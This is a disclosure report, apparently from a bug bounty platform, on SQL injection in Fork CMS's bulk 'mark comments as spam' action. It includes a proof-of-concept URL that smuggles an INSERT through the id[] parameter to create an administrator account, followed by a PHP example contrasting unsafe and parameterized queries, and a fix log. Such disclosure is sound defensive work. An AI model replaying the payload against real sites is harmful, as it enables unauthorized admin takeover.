SQL injection through marking blog comments on bulk as spam in forkcms/forkcms

Valid

Reported on Mar 23rd 2022

Description

The comment ids passed to the bulk action are not validated and are vulnerable to SQL injection.

Proof of Concept

https://127.0.0.1:8001/private/en/blog/mass_comment_action?token=q58o77xs9&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=spam

Impact

This vulnerability allows SQL injection.
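The defect the report describes is a list of request-supplied comment ids reaching the SQL text unchecked. The following is an added example written for this page, not Fork CMS's own code: it shows the weak concatenation pattern next to a hardened version that validates every id as a positive integer and binds the values as parameters. It assumes PDO with an in-memory SQLite database; the table name `blog_comments`, its `status` column, and the function names `markSpamUnsafe` and `markSpam` are hypothetical.

```php
<?php
// Added example (not Fork CMS code): hardening a bulk "mark as spam" action
// against SQL injection through the id[] request parameter.
// Assumptions: a PDO connection and a hypothetical blog_comments(id, status)
// table; the query shape and names are illustrative only.

declare(strict_types=1);

/**
 * Weak pattern: request values are concatenated straight into the IN (...)
 * list, so any value that is not a plain integer becomes part of the SQL
 * statement instead of data.
 */
function markSpamUnsafe(PDO $db, array $ids): int
{
    $sql = "UPDATE blog_comments SET status = 'spam' WHERE id IN (" . implode(',', $ids) . ")";
    return $db->exec($sql);
}

/**
 * Hardened pattern: every id must validate as a positive integer (anything
 * else aborts the whole request), and the ids reach the database only as
 * bound parameters, never as SQL text.
 */
function markSpam(PDO $db, array $ids): int
{
    $clean = [];
    foreach ($ids as $id) {
        $int = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($int === false) {
            throw new InvalidArgumentException('comment id must be a positive integer');
        }
        $clean[] = $int;
    }
    if ($clean === []) {
        return 0;
    }

    // One placeholder per id; the statement text never contains user input.
    $placeholders = implode(',', array_fill(0, count($clean), '?'));
    $stmt = $db->prepare("UPDATE blog_comments SET status = 'spam' WHERE id IN ($placeholders)");
    foreach ($clean as $i => $int) {
        $stmt->bindValue($i + 1, $int, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed in-memory fixture so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE blog_comments (id INTEGER PRIMARY KEY, status TEXT NOT NULL DEFAULT 'published')");
$db->exec("INSERT INTO blog_comments (id) VALUES (1), (2), (3)");

// Well-formed request: comments 1 and 3 are marked as spam.
echo "updated rows: " . markSpam($db, ['1', '3']) . "\n";

// Malformed request (constructed value, not the report's payload): rejected
// before any SQL is built, instead of being spliced into the statement.
try {
    markSpam($db, ['2', '2) --']);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

Rejecting the whole request on the first bad id, rather than silently dropping it, is deliberate: a non-integer value in an id list is never a legitimate user action, so failing loudly makes the attempt visible in application logs instead of hiding it.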

We are processing your report and will contact the forkcms team within 24 hours. (a year ago)

Jelmer Prins modified the report (a year ago)

Jelmer Prins (Maintainer), a year ago:

@admin found this one while writing fixes for other reported issues but it seems like I can't approve nor confirm it

Jamie Slome validated this vulnerability a year ago
Jelmer Prins has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome marked this as fixed in 5.11.1 with commit 6aca30 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE